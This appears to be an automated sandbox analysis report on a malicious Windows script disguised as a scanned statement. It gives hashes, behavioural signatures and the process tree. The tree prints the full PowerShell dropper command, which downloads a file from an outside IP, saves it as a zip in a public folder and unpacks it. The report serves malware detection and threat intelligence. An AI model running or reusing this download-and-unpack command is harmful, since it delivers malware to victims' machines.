Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
16-02-2024 21:24
Static task
static1
Behavioral task
behavioral1
Sample
Scan001-StatementReport.wsf
Resource
win7-20231129-en
windows7-x64
5 signatures
150 seconds
General
-
Target
Scan001-StatementReport.wsf
-
Size
31KB
-
MD5
99ec5f8d2779e65e64c54265f8ee1547
-
SHA1
593116987bdd5119eceec7882c8fbd11fae139f2
-
SHA256
62edf192312ffa77440aaac0de4b693126e2c14e6a96c9764de45fc4ff6c2ef1
-
SHA512
e39896113ea391097335b2c93d9d6dd76b255281c0aebc948c8a47ecd83fd7e1997ac224a30f108153b17d37f4fdd75dbce2a8d6ed9f5034af34293083cc4cbe
-
SSDEEP
768:Fs0IeoVcogHzATv4MR1b6rONCps0IeoVcogHzATv4MR1b6rONCD:pMXKceMXKcs
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://176.107.183.105:555/w.jpg
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
WScript.exeflow pid process 2 1704 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2244 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2244 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1704 wrote to memory of 2244 1704 WScript.exe powershell.exe PID 1704 wrote to memory of 2244 1704 WScript.exe powershell.exe PID 1704 wrote to memory of 2244 1704 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Scan001-StatementReport.wsf"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://176.107.183.105:555/w.jpg' -Destination 'C:\Users\Public\ty.zip';Expand-Archive -Path 'C:\Users\Public\ty.zip' -DestinationPath 'C:\Users\Public\' -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2244
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2244-7-0x000000001B930000-0x000000001BC12000-memory.dmpFilesize
2.9MB
-
memory/2244-8-0x0000000001E10000-0x0000000001E18000-memory.dmpFilesize
32KB
-
memory/2244-9-0x000007FEF59A0000-0x000007FEF633D000-memory.dmpFilesize
9.6MB
-
memory/2244-10-0x0000000002FE0000-0x0000000003060000-memory.dmpFilesize
512KB
-
memory/2244-13-0x0000000002FE0000-0x0000000003060000-memory.dmpFilesize
512KB
-
memory/2244-15-0x000007FEF59A0000-0x000007FEF633D000-memory.dmpFilesize
9.6MB
-
memory/2244-14-0x0000000002FE0000-0x0000000003060000-memory.dmpFilesize
512KB
-
memory/2244-12-0x0000000002FE4000-0x0000000002FE7000-memory.dmpFilesize
12KB
-
memory/2244-11-0x000007FEF59A0000-0x000007FEF633D000-memory.dmpFilesize
9.6MB